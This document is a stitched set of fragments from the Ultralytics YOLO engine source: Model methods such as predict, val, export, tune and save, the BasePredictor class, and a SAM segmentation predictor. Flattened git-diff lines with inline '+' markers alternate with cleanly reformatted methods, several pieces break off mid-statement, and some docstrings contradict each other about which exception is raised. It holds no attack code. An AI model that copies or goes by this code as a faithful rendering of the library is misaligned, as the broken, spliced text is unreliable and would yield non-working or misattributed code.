    merged_args.update(self.overrides)  # model args take priority over the defaults
    network.args = merged_args
    network.task = self.task
    self.model_name = cfg
It sets + up the model, task, and related attributes based on the loaded weights. + + Args: + weights (str): Path to the model weights file to be loaded. + task (str | None): The task associated with the model. If None, it will be inferred from the model. + + Raises: + FileNotFoundError: If the specified weights file does not exist or is inaccessible. + ValueError: If the weights file format is unsupported or invalid. + + Examples: + >>> model = Model() + >>> model._load("yolo11n.pt") + >>> model._load("path/to/weights.pth", task="detect") + """ + if weights.lower().startswith(("https://", "http://", "rtsp://", "rtmp://", "tcp://")): + weights = checks.check_file(weights, download_dir=SETTINGS["weights_dir"]) # download and return local file + weights = checks.check_model_file_from_stem(weights) # add suffix, i.e. yolov8n -> yolov8n.pt + + if Path(weights).suffix == ".pt": + self.model, self.ckpt = attempt_load_one_weight(weights) + self.task = self.model.args["task"] + self.overrides = self.model.args = self._reset_ckpt_args(self.model.args) + self.ckpt_path = self.model.pt_path + else: + weights = checks.check_file(weights) # runs in all cases, not redundant with above call + self.model, self.ckpt = weights, None + self.task = task or guess_model_task(weights) + self.ckpt_path = weights + self.overrides["model"] = weights + self.overrides["task"] = self.task + self.model_name = weights + + def _check_is_pytorch_model(self) -> None: + """ + Checks if the model is a PyTorch model and raises a TypeError if it's not. + + This method verifies that the model is either a PyTorch module or a .pt file. It's used to ensure that + certain operations that require a PyTorch model are only performed on compatible model types. + + Raises: + TypeError: If the model is not a PyTorch module or a .pt file. The error message provides detailed + information about supported model formats and operations. 
def reset_weights(self) -> "Model":
    """
    Re-initializes the model's weights and makes every parameter trainable.

    Each sub-module that exposes a 'reset_parameters' method has it called, after which 'requires_grad' is
    set to True on all parameters of the model.

    Returns:
        (Model): The same instance, to allow call chaining.

    Raises:
        TypeError: If the model is not a PyTorch model (raised by '_check_is_pytorch_model').

    Examples:
        >>> model = Model("yolo11n.pt")
        >>> model.reset_weights()
    """
    self._check_is_pytorch_model()
    network = self.model
    resettable = (layer for layer in network.modules() if hasattr(layer, "reset_parameters"))
    for layer in resettable:
        layer.reset_parameters()
    for param in network.parameters():
        param.requires_grad = True
    return self
def save(self, filename: Union[str, Path] = "saved_model.pt") -> None:
    """
    Saves the current model state to a file.

    The saved dictionary contains everything from the loaded checkpoint (if any), updated with a
    half-precision deep copy of the model and metadata: the current date, the Ultralytics version, license
    information and a link to the documentation.

    Args:
        filename (Union[str, Path]): The name of the file to save the model to.

    Raises:
        TypeError: If the model is not a PyTorch model (raised by '_check_is_pytorch_model').

    Examples:
        >>> model = Model("yolo11n.pt")
        >>> model.save("my_model.pt")
    """
    self._check_is_pytorch_model()
    from copy import deepcopy
    from datetime import datetime

    from ultralytics import __version__

    updates = {
        "model": deepcopy(self.model).half() if isinstance(self.model, nn.Module) else self.model,
        "date": datetime.now().isoformat(),
        "version": __version__,
        "license": "AGPL-3.0 License (https://ultralytics.com/license)",
        "docs": "https://docs.ultralytics.com",
    }
    # self.ckpt stays None when no *.pt checkpoint was loaded (e.g. a model built from YAML);
    # unpacking None would raise TypeError, so fall back to an empty checkpoint in that case
    torch.save({**(self.ckpt or {}), **updates}, filename)
def fuse(self):
    """
    Fuses the layers of the underlying model for optimized inference.

    After verifying that the model is a PyTorch model, the call is delegated to the 'fuse' method of the
    underlying model, which is expected to merge Conv2d and BatchNorm2d layers.

    Raises:
        TypeError: If the model is not a PyTorch model (raised by '_check_is_pytorch_model').

    Examples:
        >>> model = Model("yolo11n.pt")
        >>> model.fuse()
        >>> # Model is now fused and ready for optimized inference
    """
    self._check_is_pytorch_model()
    network = self.model
    network.fuse()
def predict(
    self,
    source: Union[str, Path, int, Image.Image, list, tuple, np.ndarray, torch.Tensor] = None,
    stream: bool = False,
    predictor=None,
    **kwargs,
) -> List[Results]:
    """
    Runs inference on the given source and returns the prediction results.

    A predictor is created on the first call and reused afterwards. On later calls only its arguments
    (and, if 'project' or 'name' is given, its save directory) are refreshed.

    Args:
        source (str | Path | int | PIL.Image | np.ndarray | torch.Tensor | List | Tuple): The source
            of the image(s) to make predictions on.
        stream (bool): If True, treats the input source as a continuous stream for predictions.
        predictor (BasePredictor | None): A custom predictor class. If None, the default predictor
            returned by self._smart_load("predictor") is used.
        **kwargs (Any): Additional keyword arguments for configuring the prediction process.

    Returns:
        (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a
            Results object.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> results = model.predict(source="path/to/image.jpg", conf=0.25)
        >>> for r in results:
        ...     print(r.boxes.data)  # print detection bounding boxes

    Notes:
        - If 'source' is not provided, it defaults to the ASSETS constant with a warning.
        - Argument priority, lowest to highest: model overrides, method defaults, keyword arguments.
        - When invoked through the 'yolo'/'ultralytics' CLI in predict or track mode, results are saved
          by default and 'predict_cli' is used.
        - For SAM-type models, 'prompts' can be passed as a keyword argument.
    """
    if source is None:
        source = ASSETS
        LOGGER.warning(f"WARNING ⚠️ 'source' is missing. Using 'source={source}'.")

    # Detect a command-line invocation: executable name plus a predict/track mode token in argv
    launched_by_cli = ARGV[0].endswith("yolo") or ARGV[0].endswith("ultralytics")
    cli_mode_tokens = ("predict", "track", "mode=predict", "mode=track")
    is_cli = launched_by_cli and any(token in ARGV for token in cli_mode_tokens)

    # Merge arguments, highest priority last
    merged = dict(self.overrides)
    merged.update({"conf": 0.25, "batch": 1, "save": is_cli, "mode": "predict"})  # method defaults
    merged.update(kwargs)
    prompts = merged.pop("prompts", None)  # for SAM-type models

    if self.predictor:
        # Predictor already set up: only refresh its arguments
        self.predictor.args = get_cfg(self.predictor.args, merged)
        if "project" in merged or "name" in merged:
            self.predictor.save_dir = get_save_dir(self.predictor.args)
    else:
        predictor_cls = predictor or self._smart_load("predictor")
        self.predictor = predictor_cls(overrides=merged, _callbacks=self.callbacks)
        self.predictor.setup_model(model=self.model, verbose=is_cli)

    if prompts and hasattr(self.predictor, "set_prompts"):  # for SAM-type models
        self.predictor.set_prompts(prompts)

    if is_cli:
        return self.predictor.predict_cli(source=source)
    return self.predictor(source=source, stream=stream)
False, + **kwargs, + ) -> List[Results]: + """ + Conducts object tracking on the specified input source using the registered trackers. + + This method performs object tracking using the model's predictors and optionally registered trackers. It handles + various input sources such as file paths or video streams, and supports customization through keyword arguments. + The method registers trackers if not already present and can persist them between calls. + + Args: + source (Union[str, Path, int, List, Tuple, np.ndarray, torch.Tensor], optional): Input source for object + tracking. Can be a file path, URL, or video stream. + stream (bool): If True, treats the input source as a continuous video stream. Defaults to False. + persist (bool): If True, persists trackers between different calls to this method. Defaults to False. + **kwargs (Any): Additional keyword arguments for configuring the tracking process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of tracking results, each a Results object. + + Raises: + AttributeError: If the predictor does not have registered trackers. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.track(source="path/to/video.mp4", show=True) + >>> for r in results: + ... print(r.boxes.id) # print tracking IDs + + Notes: + - This method sets a default confidence threshold of 0.1 for ByteTrack-based tracking. + - The tracking mode is explicitly set in the keyword arguments. + - Batch size is set to 1 for tracking in videos. 
def val(
    self,
    validator=None,
    **kwargs,
):
    """
    Validates the model and stores the resulting metrics on the instance.

    The validation arguments are assembled from the model overrides, the method default 'rect=True' and
    the user-provided keyword arguments, in increasing priority. The mode is always forced to 'val'.

    Args:
        validator (ultralytics.engine.validator.BaseValidator | None): A custom validator class. If None,
            the default validator returned by self._smart_load("validator") is used.
        **kwargs (Any): Arbitrary keyword arguments for customizing the validation process.

    Returns:
        (ultralytics.utils.metrics.DetMetrics): Validation metrics obtained from the validation process.
            The same object is also stored in 'self.metrics'.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> results = model.val(data="coco8.yaml", imgsz=640)
        >>> print(results.box.map)  # Print mAP50-95
    """
    settings = dict(self.overrides)
    settings.update({"rect": True})  # method defaults
    settings.update(kwargs)
    settings["mode"] = "val"  # always wins, even over a user-supplied 'mode'

    validator_cls = validator or self._smart_load("validator")
    runner = validator_cls(args=settings, _callbacks=self.callbacks)
    runner(model=self.model)
    self.metrics = runner.metrics
    return runner.metrics
def export(
    self,
    **kwargs,
) -> str:
    """
    Exports the model to a different format suitable for deployment.

    The export arguments are assembled from the model overrides, the method defaults and the user-provided
    keyword arguments, in increasing priority. The mode is always forced to 'export'. The actual export is
    performed by the 'Exporter' class.

    Args:
        **kwargs (Dict): Arbitrary keyword arguments to customize the export process. Common arguments
            include:
            format (str): Export format (e.g., 'onnx', 'engine', 'coreml').
            half (bool): Export model in half-precision.
            int8 (bool): Export model in int8 precision.
            device (str): Device to run the export on.
            workspace (int): Maximum memory workspace size for TensorRT engines.
            nms (bool): Add Non-Maximum Suppression (NMS) module to model.
            simplify (bool): Simplify ONNX model.

    Returns:
        (str): The path to the exported model file.

    Raises:
        TypeError: If the model is not a PyTorch model (raised by '_check_is_pytorch_model').

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> model.export(format="onnx", dynamic=True, simplify=True)
        'path/to/exported/model.onnx'
    """
    self._check_is_pytorch_model()
    from .exporter import Exporter

    export_args = dict(self.overrides)
    export_args.update(
        imgsz=self.model.args["imgsz"],
        batch=1,
        data=None,
        device=None,  # reset to avoid multi-GPU errors
        verbose=False,
    )  # method defaults
    export_args.update(kwargs)
    export_args["mode"] = "export"  # highest priority

    exporter = Exporter(overrides=export_args, _callbacks=self.callbacks)
    return exporter(model=self.model)
The method handles scenarios such as resuming training + from a checkpoint, integrating with Ultralytics HUB, and updating model and configuration after training. + + When using Ultralytics HUB, if the session has a loaded model, the method prioritizes HUB training + arguments and warns if local arguments are provided. It checks for pip updates and combines default + configurations, method-specific defaults, and user-provided arguments to configure the training process. + + Args: + trainer (BaseTrainer | None): Custom trainer instance for model training. If None, uses default. + **kwargs (Any): Arbitrary keyword arguments for training configuration. Common options include: + data (str): Path to dataset configuration file. + epochs (int): Number of training epochs. + batch_size (int): Batch size for training. + imgsz (int): Input image size. + device (str): Device to run training on (e.g., 'cuda', 'cpu'). + workers (int): Number of worker threads for data loading. + optimizer (str): Optimizer to use for training. + lr0 (float): Initial learning rate. + patience (int): Epochs to wait for no observable improvement for early stopping of training. + + Returns: + (Dict | None): Training metrics if available and training is successful; otherwise, None. + + Raises: + AssertionError: If the model is not a PyTorch model. + PermissionError: If there is a permission issue with the HUB session. + ModuleNotFoundError: If the HUB SDK is not installed. 
def tune(
    self,
    use_ray=False,
    iterations=10,
    *args,
    **kwargs,
):
    """
    Run a hyperparameter search, either with Ray Tune or with the built-in `Tuner`.

    With `use_ray=True` the call is forwarded to `run_ray_tune` from `ultralytics.utils.tuner`, passing this
    model, `max_samples=iterations` and any extra positional/keyword arguments unchanged. Otherwise a `Tuner`
    is built from the model's stored overrides merged with `kwargs` (kwargs win, and `mode` is forced to
    "train") and is invoked with this model and `iterations`.

    Args:
        use_ray (bool): Select the Ray Tune backend when True. Defaults to False.
        iterations (int): Number of tuning iterations (`max_samples` for Ray Tune). Defaults to 10.
        *args (Any): Extra positional arguments; only forwarded on the Ray Tune path.
        **kwargs (Any): Extra keyword arguments; forwarded to Ray Tune, or merged over the model's overrides
            for the built-in tuner.

    Returns:
        (Any): The value returned by the selected tuning backend.

    Raises:
        AssertionError: Presumably raised by `_check_is_pytorch_model()` when the model is not a PyTorch
            model; that helper is defined outside this block.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> results = model.tune(use_ray=True, iterations=20)
        >>> print(results)
    """
    self._check_is_pytorch_model()

    if not use_ray:
        from .tuner import Tuner

        # Caller kwargs take priority over stored overrides; mode is always "train"
        tuner_args = {**self.overrides, **kwargs}
        tuner_args["mode"] = "train"
        tuner = Tuner(args=tuner_args, _callbacks=self.callbacks)
        return tuner(model=self, iterations=iterations)

    from ultralytics.utils.tuner import run_ray_tune

    return run_ray_tune(self, *args, max_samples=iterations, **kwargs)
@property
def names(self) -> Dict[int, str]:
    """
    Return the class names of the loaded model.

    When the wrapped model exposes a `names` attribute, it is passed through `check_class_names` from
    `ultralytics.nn.autobackend` and the result is returned. Otherwise the names are read from the predictor's
    model; if no predictor exists yet, one is created via `_smart_load("predictor")` and set up with the
    current model first.

    Returns:
        (Dict[int, str]): Class names associated with the model.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> print(model.names)
        {0: 'person', 1: 'bicycle', 2: 'car', ...}
    """
    from ultralytics.nn.autobackend import check_class_names

    if not hasattr(self.model, "names"):
        # Export formats have no predictor until predict() is called, so build one on demand
        if not self.predictor:
            predictor_cls = self._smart_load("predictor")
            self.predictor = predictor_cls(overrides=self.overrides, _callbacks=self.callbacks)
            self.predictor.setup_model(model=self.model, verbose=False)
        return self.predictor.model.names

    return check_class_names(self.model.names)
@property
def transforms(self):
    """
    Return the `transforms` attribute of the wrapped model, if it has one.

    Returns:
        (object | None): `self.model.transforms` when the model defines that attribute, otherwise None.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> transforms = model.transforms
        >>> if transforms:
        ...     print(f"Model transforms: {transforms}")
        ... else:
        ...     print("No transforms defined for this model.")
    """
    wrapped = self.model
    if hasattr(wrapped, "transforms"):
        return wrapped.transforms
    return None
def clear_callback(self, event: str) -> None:
    """
    Remove every callback registered for `event`.

    The entry for `event` in `self.callbacks` is replaced with a new empty list, so nothing is run for that
    event until callbacks are added again. All entries are dropped, whatever their origin; other events are
    left untouched.

    Args:
        event (str): Name of the event whose callback list should be emptied.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> model.add_callback("on_train_start", lambda trainer: print("Training started"))
        >>> model.clear_callback("on_train_start")
        >>> # All callbacks for 'on_train_start' are now removed
    """
    registry = self.callbacks
    registry[event] = list()
@staticmethod
def _reset_ckpt_args(args: dict) -> dict:
    """
    Keep only the checkpoint arguments that should be remembered when loading a PyTorch model.

    Only the keys "imgsz", "data", "task" and "single_cls" survive; every other entry is dropped. The input
    dictionary is not modified and the surviving keys keep their original order.

    Args:
        args (dict): Arguments stored with a checkpoint.

    Returns:
        (dict): A new dictionary holding the retained key/value pairs.

    Examples:
        >>> original_args = {"imgsz": 640, "data": "coco.yaml", "task": "detect", "batch": 16, "epochs": 100}
        >>> Model._reset_ckpt_args(original_args)
        {'imgsz': 640, 'data': 'coco.yaml', 'task': 'detect'}
    """
    remembered = frozenset(("imgsz", "data", "task", "single_cls"))
    kept = {}
    for key, value in args.items():
        if key in remembered:
            kept[key] = value
    return kept
@property
def task_map(self) -> dict:
    """
    Map each supported task to the classes used for it; must be provided by subclasses.

    This base implementation always raises. `_smart_load` indexes the mapping as `task_map[task][key]`, so an
    override is expected to return a dictionary keyed by task name whose values are dictionaries keyed by
    module kind (for example 'model', 'trainer', 'validator', 'predictor').

    Returns:
        (dict): Never returns in this base implementation.

    Raises:
        NotImplementedError: Always, to signal that no task map has been provided.

    Examples:
        >>> model = YOLO("yolo11n.pt")  # a subclass that overrides task_map
        >>> detect_class_map = model.task_map["detect"]
    """
    message = "Please provide task map for your model!"
    raise NotImplementedError(message)
+ + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.stride) + >>> print(model.task) + """ + if name == "model": + return self._modules["model"] + return getattr(self.model, name) diff --git a/2024.ultralytics/v8.3.40/engine/predictor.py b/2024.ultralytics/v8.3.40/engine/predictor.py new file mode 100644 index 0000000..c28e189 --- /dev/null +++ b/2024.ultralytics/v8.3.40/engine/predictor.py @@ -0,0 +1,408 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license +""" +Run prediction on images, videos, directories, globs, YouTube, webcam, streams, etc. + +Usage - sources: + $ yolo mode=predict model=yolov8n.pt source=0 # webcam + img.jpg # image + vid.mp4 # video + screen # screenshot + path/ # directory + list.txt # list of images + list.streams # list of streams + 'path/*.jpg' # glob + 'https://youtu.be/LNwODJXcvt4' # YouTube + 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP, TCP stream + +Usage - formats: + $ yolo mode=predict model=yolov8n.pt # PyTorch + yolov8n.torchscript # TorchScript + yolov8n.onnx # ONNX Runtime or OpenCV DNN with dnn=True + yolov8n_openvino_model # OpenVINO + yolov8n.engine # TensorRT + yolov8n.mlpackage # CoreML (macOS-only) + yolov8n_saved_model # TensorFlow SavedModel + yolov8n.pb # TensorFlow GraphDef + yolov8n.tflite # TensorFlow Lite + yolov8n_edgetpu.tflite # TensorFlow Edge TPU + yolov8n_paddle_model # PaddlePaddle + yolov8n.mnn # MNN + yolov8n_ncnn_model # NCNN +""" + +import platform +import re +import threading +from pathlib import Path + +import cv2 +import numpy as np +import torch + +from ultralytics.cfg import get_cfg, get_save_dir +from ultralytics.data import load_inference_source +from ultralytics.data.augment import LetterBox, classify_transforms +from ultralytics.nn.autobackend import AutoBackend +from ultralytics.utils import DEFAULT_CFG, LOGGER, MACOS, WINDOWS, callbacks, colorstr, ops +from ultralytics.utils.checks import check_imgsz, check_imshow +from ultralytics.utils.files import increment_path +from 
def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None):
    """
    Build the predictor configuration and reset all per-run state.

    The configuration is resolved with `get_cfg(cfg, overrides)` and the save directory with `get_save_dir`.
    A missing confidence threshold falls back to 0.25, and `show` is re-validated through `check_imshow` when
    it was requested. Integration callbacks are attached last.

    Args:
        cfg (Any): Base configuration handed to `get_cfg`. Defaults to DEFAULT_CFG.
        overrides (dict, optional): Configuration overrides handed to `get_cfg`. Defaults to None.
        _callbacks (dict, optional): Callback registry to use; when falsy, the registry returned by
            `callbacks.get_default_callbacks()` is used instead.
    """
    args = get_cfg(cfg, overrides)
    self.args = args
    self.save_dir = get_save_dir(args)
    if args.conf is None:
        args.conf = 0.25  # default conf=0.25
    self.done_warmup = False
    if args.show:
        args.show = check_imshow(warn=True)

    # Attributes that are only usable once the model/source setup has run
    self.model = self.imgsz = self.device = self.dataset = None
    self.plotted_img = self.source_type = self.batch = None
    self.results = self.transforms = self.txt_path = None
    self.data = args.data  # data_dict
    self.vid_writer = {}  # dict of {save_path: video_writer, ...}
    self.seen = 0
    self.windows = []

    self.callbacks = _callbacks or callbacks.get_default_callbacks()
    self._lock = threading.Lock()  # for automatic thread-safe inference
    callbacks.add_integration_callbacks(self)
def __call__(self, source=None, model=None, stream=False, *args, **kwargs):
    """
    Run inference on `source`, lazily or eagerly depending on `stream`.

    The `stream` flag is stored on the instance, then `stream_inference` is called with the remaining
    arguments. With a truthy `stream` its result is returned untouched so the caller can iterate lazily;
    otherwise it is fully consumed into a list.

    Args:
        source (Any): Inference source forwarded to `stream_inference`.
        model (Any): Model forwarded to `stream_inference`.
        stream (bool): Return the lazy iterable instead of a list when truthy.
        *args (Any): Extra positional arguments forwarded to `stream_inference`.
        **kwargs (Any): Extra keyword arguments forwarded to `stream_inference`.

    Returns:
        (Iterable | list): The object returned by `stream_inference`, or a list of its items.
    """
    self.stream = stream
    results = self.stream_inference(source, model, *args, **kwargs)
    return results if stream else list(results)  # merge list of Result into one
def setup_source(self, source):
    """
    Prepare the image size, transforms and dataset for a new inference source.

    The image size is validated with `check_imgsz` against the model stride. For the "classify" task the
    transforms are taken from `self.model.model.transforms`, falling back to `classify_transforms`; for every
    other task they are None. The dataset is built with `load_inference_source`, and the video-writer cache
    is reset.

    When the predictor was explicitly called with `stream=False` and the source is a stream, a screenshot,
    more than 1000 items, or contains a video, `STREAM_WARNING` is logged.

    Args:
        source (Any): Inference source handed to `load_inference_source`.
    """
    self.imgsz = check_imgsz(self.args.imgsz, stride=self.model.stride, min_dim=2)  # check image size

    if self.args.task == "classify":
        inner_model = self.model.model
        fallback = classify_transforms(self.imgsz[0], crop_fraction=self.args.crop_fraction)
        self.transforms = getattr(inner_model, "transforms", fallback)
    else:
        self.transforms = None

    self.dataset = load_inference_source(
        source=source,
        batch=self.args.batch,
        vid_stride=self.args.vid_stride,
        buffer=self.args.stream_buffer,
    )
    self.source_type = self.dataset.source_type

    # `stream` is only set by __call__; when it is absent no warning is issued
    if not getattr(self, "stream", True):
        kind = self.source_type
        accumulates = (
            kind.stream
            or kind.screenshot
            or len(self.dataset) > 1000  # many images
            or any(getattr(self.dataset, "video_flag", [False]))  # videos
        )
        if accumulates:
            LOGGER.warning(STREAM_WARNING)

    self.vid_writer = {}
self.run_callbacks("on_predict_start") + for self.batch in self.dataset: + self.run_callbacks("on_predict_batch_start") + paths, im0s, s = self.batch + + # Preprocess + with profilers[0]: + im = self.preprocess(im0s) + + # Inference + with profilers[1]: + preds = self.inference(im, *args, **kwargs) + if self.args.embed: + yield from [preds] if isinstance(preds, torch.Tensor) else preds # yield embedding tensors + continue + + # Postprocess + with profilers[2]: + self.results = self.postprocess(preds, im, im0s) + self.run_callbacks("on_predict_postprocess_end") + + # Visualize, save, write results + n = len(im0s) + for i in range(n): + self.seen += 1 + self.results[i].speed = { + "preprocess": profilers[0].dt * 1e3 / n, + "inference": profilers[1].dt * 1e3 / n, + "postprocess": profilers[2].dt * 1e3 / n, + } + if self.args.verbose or self.args.save or self.args.save_txt or self.args.show: + s[i] += self.write_results(i, Path(paths[i]), im, s) + + # Print batch results + if self.args.verbose: + LOGGER.info("\n".join(s)) + + self.run_callbacks("on_predict_batch_end") + yield from self.results + + # Release assets + for v in self.vid_writer.values(): + if isinstance(v, cv2.VideoWriter): + v.release() + + # Print final results + if self.args.verbose and self.seen: + t = tuple(x.t / self.seen * 1e3 for x in profilers) # speeds per image + LOGGER.info( + f"Speed: %.1fms preprocess, %.1fms inference, %.1fms postprocess per image at shape " + f"{(min(self.args.batch, self.seen), 3, *im.shape[2:])}" % t + ) + if self.args.save or self.args.save_txt or self.args.save_crop: + nl = len(list(self.save_dir.glob("labels/*.txt"))) # number of labels + s = f"\n{nl} label{'s' * (nl > 1)} saved to {self.save_dir / 'labels'}" if self.args.save_txt else "" + LOGGER.info(f"Results saved to {colorstr('bold', self.save_dir)}{s}") + self.run_callbacks("on_predict_end") + + def setup_model(self, model, verbose=True): + """Initialize YOLO model with given parameters and set it to evaluation 
def save_predicted_images(self, save_path="", frame=0):
    """
    Write the most recently plotted image to disk as a video frame or as a still image.

    For datasets in "stream" or "video" mode, `self.plotted_img` is appended to a `cv2.VideoWriter` that is
    created on first use and cached per `save_path` in `self.vid_writer`. The container is `.mp4` (avc1) on
    macOS, `.avi` (WMV2) on Windows and `.avi` (MJPG) elsewhere. When `self.args.save_frames` is set, each
    frame is additionally written as `<frame>.jpg` into a `<name>_frames/` directory next to the output.

    For every other dataset mode the image is written once as a JPG, using `save_path` with its suffix
    replaced by `.jpg`.

    Args:
        save_path (str): Destination path; its suffix is replaced by the one actually used.
        frame (int | None): Frame number used to name the per-frame JPG when `save_frames` is enabled.
    """
    im = self.plotted_img

    # Save videos and streams
    if self.dataset.mode in {"stream", "video"}:
        fps = self.dataset.fps if self.dataset.mode == "video" else 30

        # Strip the extension from the file name only. Splitting the whole path at its first "." would cut
        # inside a dotted directory name (e.g. "runs/exp1.5/video.mp4" -> "runs/exp1_frames/").
        sep_at = max(save_path.rfind("/"), save_path.rfind("\\"))
        directory, filename = save_path[: sep_at + 1], save_path[sep_at + 1 :]
        frames_path = f"{directory}{filename.split('.', 1)[0]}_frames/"

        if save_path not in self.vid_writer:  # new video
            if self.args.save_frames:
                Path(frames_path).mkdir(parents=True, exist_ok=True)
            suffix, fourcc = (".mp4", "avc1") if MACOS else (".avi", "WMV2") if WINDOWS else (".avi", "MJPG")
            self.vid_writer[save_path] = cv2.VideoWriter(
                filename=str(Path(save_path).with_suffix(suffix)),
                fourcc=cv2.VideoWriter_fourcc(*fourcc),
                fps=fps,  # integer required, floats produce error in MP4 codec
                frameSize=(im.shape[1], im.shape[0]),  # (width, height)
            )

        # Save video
        self.vid_writer[save_path].write(im)
        if self.args.save_frames:
            cv2.imwrite(f"{frames_path}{frame}.jpg", im)

    # Save images
    else:
        cv2.imwrite(str(Path(save_path).with_suffix(".jpg")), im)  # save to JPG for best support
+ +SAM is an advanced image segmentation model offering features like promptable segmentation and zero-shot performance. +This module contains the implementation of the prediction logic and auxiliary utilities required to perform segmentation +using SAM. It forms an integral part of the Ultralytics framework and is designed for high-performance, real-time image +segmentation tasks. +""" + +from collections import OrderedDict + +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.data.augment import LetterBox +from ultralytics.engine.predictor import BasePredictor +from ultralytics.engine.results import Results +from ultralytics.utils import DEFAULT_CFG, ops +from ultralytics.utils.torch_utils import select_device, smart_inference_mode + +from .amg import ( + batch_iterator, + batched_mask_to_box, + build_all_layer_point_grids, + calculate_stability_score, + generate_crop_boxes, + is_box_near_crop_edge, + remove_small_regions, + uncrop_boxes_xyxy, + uncrop_masks, +) +from .build import build_sam + + +class Predictor(BasePredictor): + """ + Predictor class for SAM, enabling real-time image segmentation with promptable capabilities. + + This class extends BasePredictor and implements the Segment Anything Model (SAM) for advanced image + segmentation tasks. It supports various input prompts like points, bounding boxes, and masks for + fine-grained control over segmentation results. + + Attributes: + args (SimpleNamespace): Configuration arguments for the predictor. + model (torch.nn.Module): The loaded SAM model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + im (torch.Tensor): The preprocessed input image. + features (torch.Tensor): Extracted image features. + prompts (Dict): Dictionary to store various types of prompts (e.g., bboxes, points, masks). + segment_all (bool): Flag to indicate if full image segmentation should be performed. + mean (torch.Tensor): Mean values for image normalization. 
+ std (torch.Tensor): Standard deviation values for image normalization. + + Methods: + preprocess: Prepares input images for model inference. + pre_transform: Performs initial transformations on the input image. + inference: Performs segmentation inference based on input prompts. + prompt_inference: Internal function for prompt-based segmentation inference. + generate: Generates segmentation masks for an entire image. + setup_model: Initializes the SAM model for inference. + get_model: Builds and returns a SAM model. + postprocess: Post-processes model outputs to generate final results. + setup_source: Sets up the data source for inference. + set_image: Sets and preprocesses a single image for inference. + get_im_features: Extracts image features using the SAM image encoder. + set_prompts: Sets prompts for subsequent inference. + reset_image: Resets the current image and its features. + remove_small_regions: Removes small disconnected regions and holes from masks. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores, boxes = predictor.generate() + >>> results = predictor.postprocess((masks, scores, boxes), im, orig_img) + """ + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initialize the Predictor with configuration, overrides, and callbacks. + + Sets up the Predictor object for SAM (Segment Anything Model) and applies any configuration overrides or + callbacks provided. Initializes task-specific settings for SAM, such as retina_masks being set to True + for optimal results. + + Args: + cfg (Dict): Configuration dictionary containing default settings. + overrides (Dict | None): Dictionary of values to override default configuration. + _callbacks (Dict | None): Dictionary of callback functions to customize behavior. 
+ + Examples: + >>> predictor = Predictor(cfg=DEFAULT_CFG) + >>> predictor = Predictor(overrides={"imgsz": 640}) + >>> predictor = Predictor(_callbacks={"on_predict_start": custom_callback}) + """ + if overrides is None: + overrides = {} + overrides.update(dict(task="segment", mode="predict", batch=1)) + super().__init__(cfg, overrides, _callbacks) + self.args.retina_masks = True + self.im = None + self.features = None + self.prompts = {} + self.segment_all = False + + def preprocess(self, im): + """ + Preprocess the input image for model inference. + + This method prepares the input image by applying transformations and normalization. It supports both + torch.Tensor and list of np.ndarray as input formats. + + Args: + im (torch.Tensor | List[np.ndarray]): Input image(s) in BCHW tensor format or list of HWC numpy arrays. + + Returns: + im (torch.Tensor): The preprocessed image tensor, normalized and converted to the appropriate dtype. + + Examples: + >>> predictor = Predictor() + >>> image = torch.rand(1, 3, 640, 640) + >>> preprocessed_image = predictor.preprocess(image) + """ + if self.im is not None: + return self.im + not_tensor = not isinstance(im, torch.Tensor) + if not_tensor: + im = np.stack(self.pre_transform(im)) + im = im[..., ::-1].transpose((0, 3, 1, 2)) + im = np.ascontiguousarray(im) + im = torch.from_numpy(im) + + im = im.to(self.device) + im = im.half() if self.model.fp16 else im.float() + if not_tensor: + im = (im - self.mean) / self.std + return im + + def pre_transform(self, im): + """ + Perform initial transformations on the input image for preprocessing. + + This method applies transformations such as resizing to prepare the image for further preprocessing. + Currently, batched inference is not supported; hence the list length should be 1. + + Args: + im (List[np.ndarray]): List containing a single image in HWC numpy array format. + + Returns: + (List[np.ndarray]): List containing the transformed image. 
+ + Raises: + AssertionError: If the input list contains more than one image. + + Examples: + >>> predictor = Predictor() + >>> image = np.random.rand(480, 640, 3) # Single HWC image + >>> transformed = predictor.pre_transform([image]) + >>> print(len(transformed)) + 1 + """ + assert len(im) == 1, "SAM model does not currently support batched inference" + letterbox = LetterBox(self.args.imgsz, auto=False, center=False) + return [letterbox(image=x) for x in im] + + def inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False, *args, **kwargs): + """ + Perform image segmentation inference based on the given input cues, using the currently loaded image. + + This method leverages SAM's (Segment Anything Model) architecture consisting of image encoder, prompt + encoder, and mask decoder for real-time and promptable segmentation tasks. + + Args: + im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes with shape (N, 4), in XYXY format. + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2), in pixels. + labels (np.ndarray | List | None): Labels for point prompts, shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions, shape (N, H, W). For SAM H=W=256. + multimask_output (bool): Flag to return multiple masks. Helpful for ambiguous prompts. + *args (Any): Additional positional arguments. + **kwargs (Any): Additional keyword arguments. + + Returns: + (np.ndarray): The output masks in shape (C, H, W), where C is the number of generated masks. + (np.ndarray): An array of length C containing quality scores predicted by the model for each mask. + (np.ndarray): Low-resolution logits of shape (C, H, W) for subsequent inference, where H=W=256. 
